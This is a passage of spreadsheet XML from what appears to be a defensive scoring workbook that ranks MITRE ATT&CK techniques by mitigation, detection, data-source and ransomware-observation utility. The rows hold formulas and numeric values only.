        <f t="array" ref="AK200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL200" s="37">
        <v>196</v>
      </c>
      <c r="AM200" s="37" t="str" cm="1">
        <f t="array" ref="AM200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN200" s="37">
        <v>0</v>
      </c>
      <c r="AO200" s="37">
        <v>1</v>
      </c>
      <c r="AP200" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ200" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>64.793588492063506</v>
      </c>
      <c r="AR200" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS200" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT200" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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1.5665140117157976</v>
      </c>
    </row>
    <row r="201" spans="1:47" ht="34">
      <c r="A201" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B201" s="37">
        <f t="shared" si="3"/>
        <v>108.95714285714287</v>
      </c>
      <c r="C201" s="37" t="s">
        <v>717</v>
      </c>
      <c r="D201" s="50" t="s">
        <v>718</v>
      </c>
      <c r="E201" s="37"/>
      <c r="F201" s="37">
        <v>1</v>
      </c>
      <c r="G201" s="37">
        <v>1</v>
      </c>
      <c r="H201" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I201" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J201" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K201" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L201" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M201" s="37">
        <v>0</v>
      </c>
      <c r="N201" s="56">
        <v>0</v>
      </c>
      <c r="O201" s="56">
        <v>6</v>
      </c>
      <c r="P201" s="56">
        <v>0</v>
      </c>
      <c r="Q201" s="56">
        <v>2</v>
      </c>
      <c r="R201" s="57"/>
      <c r="S201" s="57">
        <v>0</v>
      </c>
      <c r="T201" s="57"/>
      <c r="U201" s="57">
        <v>0</v>
      </c>
      <c r="V201" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.8095238095238092E-2</v>
      </c>
      <c r="W201" s="37">
        <v>0</v>
      </c>
      <c r="X201" s="37">
        <v>0</v>
      </c>
      <c r="Y201" s="37">
        <v>0</v>
      </c>
      <c r="Z201" s="37">
        <v>8</v>
      </c>
      <c r="AA201" s="37">
        <v>0.08</v>
      </c>
      <c r="AB201" s="37">
        <v>0.08</v>
      </c>
      <c r="AC201" s="37"/>
      <c r="AD201" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE201" s="37" t="str" cm="1">
        <f t="array" ref="AE201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD201)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF201" s="37">
        <v>197</v>
      </c>
      <c r="AG201" s="37" t="str" cm="1">
        <f t="array" ref="AG201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH201" s="37">
        <v>197</v>
      </c>
      <c r="AI201" s="37" t="str" cm="1">
        <f t="array" ref="AI201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ201" s="37">
        <v>197</v>
      </c>
      <c r="AK201" s="37" t="str" cm="1">
        <f t="array" ref="AK201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL201" s="37">
        <v>197</v>
      </c>
      <c r="AM201" s="37" t="str" cm="1">
        <f t="array" ref="AM201">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD201)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN201" s="37">
        <v>0</v>
      </c>
      <c r="AO201" s="37">
        <v>0</v>
      </c>
      <c r="AP201" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ201" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>36.319047619047623</v>
      </c>
      <c r="AR201" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS201" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT201" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU20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02" spans="1:47" ht="34">
      <c r="A202" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B202" s="37">
        <f t="shared" si="3"/>
        <v>254.0030733809524</v>
      </c>
      <c r="C202" s="37" t="s">
        <v>719</v>
      </c>
      <c r="D202" s="50" t="s">
        <v>720</v>
      </c>
      <c r="E202" s="37"/>
      <c r="F202" s="37">
        <v>1</v>
      </c>
      <c r="G202" s="37">
        <v>1</v>
      </c>
      <c r="H202" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I202" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J202" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K202" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L202" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M202" s="37">
        <v>6.0210000000000003E-3</v>
      </c>
      <c r="N202" s="56">
        <v>0</v>
      </c>
      <c r="O202" s="56">
        <v>5</v>
      </c>
      <c r="P202" s="56">
        <v>0</v>
      </c>
      <c r="Q202" s="56">
        <v>0</v>
      </c>
      <c r="R202" s="57" t="s">
        <v>721</v>
      </c>
      <c r="S202" s="57">
        <v>3</v>
      </c>
      <c r="T202" s="57" t="s">
        <v>722</v>
      </c>
      <c r="U202" s="57">
        <v>17</v>
      </c>
      <c r="V202" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21428552380952381</v>
      </c>
      <c r="W202" s="37">
        <v>20</v>
      </c>
      <c r="X202" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y202" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z202" s="37">
        <v>5</v>
      </c>
      <c r="AA202" s="37">
        <v>0.05</v>
      </c>
      <c r="AB202" s="37">
        <v>0.05</v>
      </c>
      <c r="AC202" s="37"/>
      <c r="AD202" s="50" t="s">
        <v>723</v>
      </c>
      <c r="AE202" s="37" t="str" cm="1">
        <f t="array" ref="AE202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD202)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF202" s="37">
        <v>198</v>
      </c>
      <c r="AG202" s="37" t="str" cm="1">
        <f t="array" ref="AG202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH202" s="37">
        <v>198</v>
      </c>
      <c r="AI202" s="37" t="str" cm="1">
        <f t="array" ref="AI202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD202)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ202" s="37">
        <v>198</v>
      </c>
      <c r="AK202" s="37" t="str" cm="1">
        <f t="array" ref="AK202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL202" s="37">
        <v>198</v>
      </c>
      <c r="AM202" s="37" t="str" cm="1">
        <f t="array" ref="AM202">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD202)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN202" s="37">
        <v>0</v>
      </c>
      <c r="AO202" s="37">
        <v>2</v>
      </c>
      <c r="AP202" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ202" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>84.667691126984138</v>
      </c>
      <c r="AR202" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS202" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT202" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU20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4.0794138631897203</v>
      </c>
    </row>
    <row r="203" spans="1:47" ht="34">
      <c r="A203" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B203" s="37">
        <f t="shared" si="3"/>
        <v>94.256977285714285</v>
      </c>
      <c r="C203" s="37" t="s">
        <v>724</v>
      </c>
      <c r="D203" s="50" t="s">
        <v>725</v>
      </c>
      <c r="E203" s="37"/>
      <c r="F203" s="37">
        <v>1</v>
      </c>
      <c r="G203" s="37">
        <v>1</v>
      </c>
      <c r="H203" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I203" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J203" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K203" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L203" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M203" s="37">
        <v>3.9789999999999999E-3</v>
      </c>
      <c r="N203" s="56">
        <v>0</v>
      </c>
      <c r="O203" s="56">
        <v>2</v>
      </c>
      <c r="P203" s="56">
        <v>1</v>
      </c>
      <c r="Q203" s="56">
        <v>0</v>
      </c>
      <c r="R203" s="57"/>
      <c r="S203" s="57">
        <v>0</v>
      </c>
      <c r="T203" s="57"/>
      <c r="U203" s="57">
        <v>0</v>
      </c>
      <c r="V203" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.4285714285714284E-2</v>
      </c>
      <c r="W203" s="37">
        <v>0</v>
      </c>
      <c r="X203" s="37">
        <v>0</v>
      </c>
      <c r="Y203" s="37">
        <v>0</v>
      </c>
      <c r="Z203" s="37">
        <v>3</v>
      </c>
      <c r="AA203" s="37">
        <v>0.03</v>
      </c>
      <c r="AB203" s="37">
        <v>0.03</v>
      </c>
      <c r="AC203" s="37"/>
      <c r="AD203" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE203" s="37" t="str" cm="1">
        <f t="array" ref="AE203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD203)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF203" s="37">
        <v>199</v>
      </c>
      <c r="AG203" s="37" t="str" cm="1">
        <f t="array" ref="AG203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH203" s="37">
        <v>199</v>
      </c>
      <c r="AI203" s="37" t="str" cm="1">
        <f t="array" ref="AI203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ203" s="37">
        <v>199</v>
      </c>
      <c r="AK203" s="37" t="str" cm="1">
        <f t="array" ref="AK203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL203" s="37">
        <v>199</v>
      </c>
      <c r="AM203" s="37" t="str" cm="1">
        <f t="array" ref="AM203">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD203)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN203" s="37">
        <v>0</v>
      </c>
      <c r="AO203" s="37">
        <v>1</v>
      </c>
      <c r="AP203" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ203" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>31.418992428571428</v>
      </c>
      <c r="AR203" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS203" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT203" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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0.77188077210884354</v>
      </c>
    </row>
    <row r="204" spans="1:47" ht="34">
      <c r="A204" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B204" s="37">
        <f t="shared" si="3"/>
        <v>106.8</v>
      </c>
      <c r="C204" s="37" t="s">
        <v>726</v>
      </c>
      <c r="D204" s="50" t="s">
        <v>727</v>
      </c>
      <c r="E204" s="37"/>
      <c r="F204" s="37">
        <v>1</v>
      </c>
      <c r="G204" s="37">
        <v>1</v>
      </c>
      <c r="H204" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I204" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J204" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K204" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L204" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M204" s="37">
        <v>0</v>
      </c>
      <c r="N204" s="56">
        <v>0</v>
      </c>
      <c r="O204" s="56">
        <v>6</v>
      </c>
      <c r="P204" s="56">
        <v>1</v>
      </c>
      <c r="Q204" s="56">
        <v>0</v>
      </c>
      <c r="R204" s="57"/>
      <c r="S204" s="57">
        <v>0</v>
      </c>
      <c r="T204" s="57"/>
      <c r="U204" s="57">
        <v>0</v>
      </c>
      <c r="V204" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W204" s="37">
        <v>0</v>
      </c>
      <c r="X204" s="37">
        <v>0</v>
      </c>
      <c r="Y204" s="37">
        <v>0</v>
      </c>
      <c r="Z204" s="37">
        <v>7</v>
      </c>
      <c r="AA204" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB204" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC204" s="37"/>
      <c r="AD204" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE204" s="37" t="str" cm="1">
        <f t="array" ref="AE204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD204)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF204" s="37">
        <v>200</v>
      </c>
      <c r="AG204" s="37" t="str" cm="1">
        <f t="array" ref="AG204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH204" s="37">
        <v>200</v>
      </c>
      <c r="AI204" s="37" t="str" cm="1">
        <f t="array" ref="AI204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ204" s="37">
        <v>200</v>
      </c>
      <c r="AK204" s="37" t="str" cm="1">
        <f t="array" ref="AK204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL204" s="37">
        <v>200</v>
      </c>
      <c r="AM204" s="37" t="str" cm="1">
        <f t="array" ref="AM204">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD204)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN204" s="37">
        <v>0</v>
      </c>
      <c r="AO204" s="37">
        <v>1</v>
      </c>
      <c r="AP204" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ204" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>35.6</v>
      </c>
      <c r="AR204" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS204" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT204" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU20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0.87142857142857144</v>
      </c>
    </row>
    <row r="205" spans="1:47" ht="34">
      <c r="A205" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B205" s="37">
        <f t="shared" si="3"/>
        <v>95.833333333333343</v>
      </c>
      <c r="C205" s="37" t="s">
        <v>728</v>
      </c>
      <c r="D205" s="50" t="s">
        <v>729</v>
      </c>
      <c r="E205" s="37"/>
      <c r="F205" s="37">
        <v>1</v>
      </c>
      <c r="G205" s="37">
        <v>1</v>
      </c>
      <c r="H205" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I205" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J205" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K205" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L205" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M205" s="37">
        <v>0</v>
      </c>
      <c r="N205" s="56">
        <v>0</v>
      </c>
      <c r="O205" s="56">
        <v>3</v>
      </c>
      <c r="P205" s="56">
        <v>0</v>
      </c>
      <c r="Q205" s="56">
        <v>1</v>
      </c>
      <c r="R205" s="57"/>
      <c r="S205" s="57">
        <v>0</v>
      </c>
      <c r="T205" s="57"/>
      <c r="U205" s="57">
        <v>0</v>
      </c>
      <c r="V205" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W205" s="37">
        <v>0</v>
      </c>
      <c r="X205" s="37">
        <v>0</v>
      </c>
      <c r="Y205" s="37">
        <v>0</v>
      </c>
      <c r="Z205" s="37">
        <v>4</v>
      </c>
      <c r="AA205" s="37">
        <v>0.04</v>
      </c>
      <c r="AB205" s="37">
        <v>0.04</v>
      </c>
      <c r="AC205" s="37"/>
      <c r="AD205" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE205" s="37" t="str" cm="1">
        <f t="array" ref="AE205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD205)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF205" s="37">
        <v>201</v>
      </c>
      <c r="AG205" s="37" t="str" cm="1">
        <f t="array" ref="AG205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH205" s="37">
        <v>201</v>
      </c>
      <c r="AI205" s="37" t="str" cm="1">
        <f t="array" ref="AI205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ205" s="37">
        <v>201</v>
      </c>
      <c r="AK205" s="37" t="str" cm="1">
        <f t="array" ref="AK205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL205" s="37">
        <v>201</v>
      </c>
      <c r="AM205" s="37" t="str" cm="1">
        <f t="array" ref="AM205">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD205)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN205" s="37">
        <v>0</v>
      </c>
      <c r="AO205" s="37">
        <v>1</v>
      </c>
      <c r="AP205" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ205" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>31.944444444444446</v>
      </c>
      <c r="AR205" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS205" s="37">
